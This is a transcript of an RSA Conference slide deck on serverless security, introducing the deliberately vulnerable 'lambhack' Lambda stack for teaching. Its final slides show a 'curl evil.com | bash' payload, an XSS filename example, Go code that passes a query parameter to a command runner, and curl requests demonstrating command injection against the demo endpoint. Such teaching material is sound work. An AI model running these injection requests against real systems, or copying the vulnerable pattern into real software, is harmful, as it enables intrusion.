Post on 05-Apr-2017
transcript
SESSION ID:SESSION ID:
#RSAC
James Wickett
Serverless Security: Are you ready for the Future?
ASD-F01
Head of ResearchSignal Sciences@wickett
#RSAC
James Wickett
2
Head of Research at Signal SciencesAuthor DevOps Fundamentals at lynda.comAuthor of book on DevOps (email me for a free copy > james@signalsciences.com)Blogger at theagileadmin.com and labs.signalsciences.com
#RSAC
Conclusion
3
Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. New serverless patterns are just emergingSecurity with serverless is easierSecurity with serverless is harder
#RSAC
Conclusion (2)
4
Four key areas apply to serverless securitySoftware Supply Chain SecurityDelivery Pipeline SecurityData Flow SecurityAttack Detection
New! A very vulnerable lambda stack open source projectgithub.com/wickett/lambhack
#RSAC
What is Serverless?
#RSAC
Misconceptions
#RSAC
It’s Marketing(cloud rebranded)
#RSAC
Serverless == no servers
#RSAC
Serverless ==Backend as a Service
#RSAC
serverless == Platform as a Service
#RSAC
TK: AdrianCO quote
#RSAC
So, what is Serverless?
#RSAC
http://martinfowler.com/articles/serverless.html
#RSAC
@mikebroberts
#RSAC
Serverless was first used to describe applications that
significantly or fully depend on 3rd party applications / services (‘in
the cloud’) to manage server-side logic and state.
http://martinfowler.com/articles/serverless.html
#RSAC
Serverless can also mean applications where some amount of server-side logic is
still written by the application developer but unlike traditional architectures is run in stateless compute containers that are
event-triggered, ephemeral (may only last for one invocation), and fully managed by
a 3rd party. http://martinfowler.com/articles/serverless.html
#RSAC
History of Serverless
17
2012 - used to describe BaaS and Continuous Integration services run by third partiesLate 2014 - AWS launched LambdaJuly 2015 - AWS launched API GatewayOctober 2015 - AWS re:Invent - The Serverless company using AWS Lambda2015 to present - Frameworks forming2016 - Serverless Conference
http://www.slideshare.net/AmazonWebServices/arc308-the-serverless-company-using-aws-lambda
#RSAC
18
Client
Server
Database
Proxy/LB
ServerServer
Old School Arch
#RSAC
Serverless Arch
19
Client
Auth Service API Gateway
Database Service
Function A
Function B
Web Delivery
#RSAC
20
#RSAC
What can we say is serverless?
#RSAC
Serverless is Functions As a Service (FaaS)
#RSAC
Containers on Demand
#RSAC
Serverless is (no management of)
Servers
#RSAC
Serverless IS SERVICEFULL
#RSAC
Serverless is an opinionated framework for compute
#RSAC
Serverless encourages functions as deploy units, coupled with third party
services that allow running end-to-end applications without worrying about
system operation.
#RSAC
A Short History of Cloud
28
#RSAC
Virtualization
#RSAC
“The Cloud”
#RSAC
DEVOPS
#RSAC
SaaSPaaSIaaS
#RSAC
Private Cloud
#RSAC
Then, along came containers
#RSAC
containers are teh hawtness
#RSAC
\
#RSAC
Lots of effort in Container Orchestration
#RSAC
The Cloud was to Virtualization as Serverless
will be to Containers
#RSAC
If you want to lead your company bravely into the new world, you
would do well to focus lot on how serverless will evolve.
- @Cloudopinionhttps://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
#RSAC
Serverless encourages functions as deploy units, coupled with third party
services that allow running end-to-end applications without worrying about
system operation.
#RSAC
So, what are the upsides?
#RSAC
Scaling built in
#RSAC
Pay for what you use in 100MS increments
#RSAC
With Serverless system administration is (mostly)
lower
#RSAC
Serverless is implicit Microservices
#RSAC
Short Circuits Ops and moves infrastructure
runtime closer to devs
#RSAC
You can skip Chefing Dockering all the things!
#RSAC
Lean Startup Friendly
#RSAC
Increased Velocity
#RSAC
Great, what’s the catch?
#RSAC
Ops Burden to rationalize Serverless model
(specifically Deploy)
#RSAC
Monitoring
#RSAC
Logging
#RSAC
Stateless for Real with no persistence* across
function runs
#RSAC
Vendor Lock-In
#RSAC
Security
#RSAC
Reliability
#RSAC
#RSAC
Serverless Use cases
#RSAC
Image resizing
#RSAC
Queue processing
61
http://martinfowler.com/articles/serverless.html
#RSAC
Run a web application
#RSAC
API Gateway
63
http://martinfowler.com/articles/serverless.html
#RSAC
CI/CD
#RSAC
Security is the same and different
#RSAC
What used to be system calls is now distributed
computing over the network
#RSAC
Serverless shifts attack surface to third parties
#RSAC
Lets try a sample application in AWS
#RSAC
Go Sparta
69
Golang!AWS Lambda supports bring your own binarySparta wraps your binary with node.js shim
#RSAC
#RSAC
Other options
71
Serverless FrameworkAPEXKappa
#RSAC
Wordy
72
Analyzes textual occurrences given a block of text, returns JSON count of wordsCalls API under the hood to get textIt is comprised of Lambda, s3, API Gateway
#RSAC
#RSAC
#RSAC
#RSAC
go run main.go provision -s S3_BUCKET
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
What I learned about serverless security
#RSAC
#RSAC
Security
#RSAC
Four areas of Serverless Security
89
Secure Software Supply ChainDelivery PipelineData Flow SecurityAttack Detection
#RSAC
Secure Software Supply Chain
#RSAC
Surface area Reduction!
#RSAC
Surface area Expansion!
#RSAC
SSL / TLS from the Provider
#RSAC
New Way
Old Way
#RSAC
Routing from the provider
#RSAC
Old Way
New Way
#RSAC
#RSAC
Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway +
Auth0
#RSAC
Abuse of open IAM privs
99
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
#RSAC
Recommendation: Use a third-party service to monitor for provider config
changes
#RSAC
Provider Security
101
Disable root access keysManage users with profilesSecure your keys in your deploy systemSecure keys in dev systemUse provider MFA
#RSAC
Delivery Pipeline Security
#RSAC
#RSAC
Unit Testing
#RSAC
Easier to mock
Harder to mock
#RSAC
#RSAC
Integration Testing
#RSAC
Configuration is part of delivery
#RSAC
#RSAC
Simple Deploy Pipeline Security
110
Only dev keys can push to ‘dev’Only build/deploy system can push to pre-prodIntegration tests must pass in this envSecurity validation must take placeAllow push to prod, only by deploy system
#RSAC
Security Integration Testing
111
BDD-Security - github.com/continuumsecurity/bdd-securityGauntlt - gauntlt.org
#RSAC
http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
#RSAC
Data Flow Security
113
DevelopmentData Flow DiagramsThreat modeling
Runtime
#RSAC
Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in
a secure manner.https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
#RSAC
Application layer DoS
#RSAC
Timeouts and Execution restrictions
#RSAC
Attack Detection
#RSAC
https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
#RSAC
AppSec Greatest Hits (XSS, SQLi, Cmdexe) still relevant
15 years later!
#RSAC
AppSec Problems
120
#RSAC
Types of Attacks
121
XSS, Injection, Deserialization, …New surface area similar problemse.g. appending to ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3
#RSAC
Defense
122
Logging, emitting eventsVandium (SQLi) wrapperContent Security Policy (CSP)More things need to be done here…
#RSAC
New Thing Alert!
123
Want to see make the point that appsec is still relevant in serverlessA vulnerable Lambda + API Gateway stack (born from the heritage of WebGoat, Rails Goat and Gruyere, …)
Introducing lambhack
#RSAC
#RSAC
lambhack
125
A Vulnerable Lambda + API Gateway stackOpen Source, MIT licensedReleased for the first time here at RSAIncludes arbitrary code execution in a query stringMore work needed, PRs accepted and looking for community helpgithub.com/wickett/lambhack
#RSAC
//command := lambdaEvent.PathParams["command"] command := lambdaEvent.QueryParams["args"] output := runner.Run(command)
Vulnerable code is also vulnerable in Serverless
#RSAC
Let’s take a look at cmdexe in lambhack
#RSAC
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
uname -a
#RSAC
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=cat+/proc/version;+sleep+1"
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
cat /proc/version
#RSAC
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=ls+-la+/tmp;+sleep+1"
total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
Let’s see /tmp
#RSAC
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=ls+/tmp;+sleep+1"
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/pargs=touch+/tmp/wickettfile;+sleep+1"
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64 wickettfile
Lambda Reuse!
#RSAC
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=which+curl;+sleep+1"
> /usr/bin/curl
Could we upload our own payload?
#RSAC
XSS, SQLi, … More to come!
#RSAC
Conclusion
135
Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. New serverless patterns are just emergingSecurity with serverless is easierSecurity with serverless is harder
#RSAC
Conclusion (2)
136
Four key areas apply to serverless securitySoftware Supply Chain SecurityDelivery Pipeline SecurityData Flow SecurityAttack Detection
New! A very vulnerable lambda stack open source projectgithub.com/wickett/lambhack
#RSAC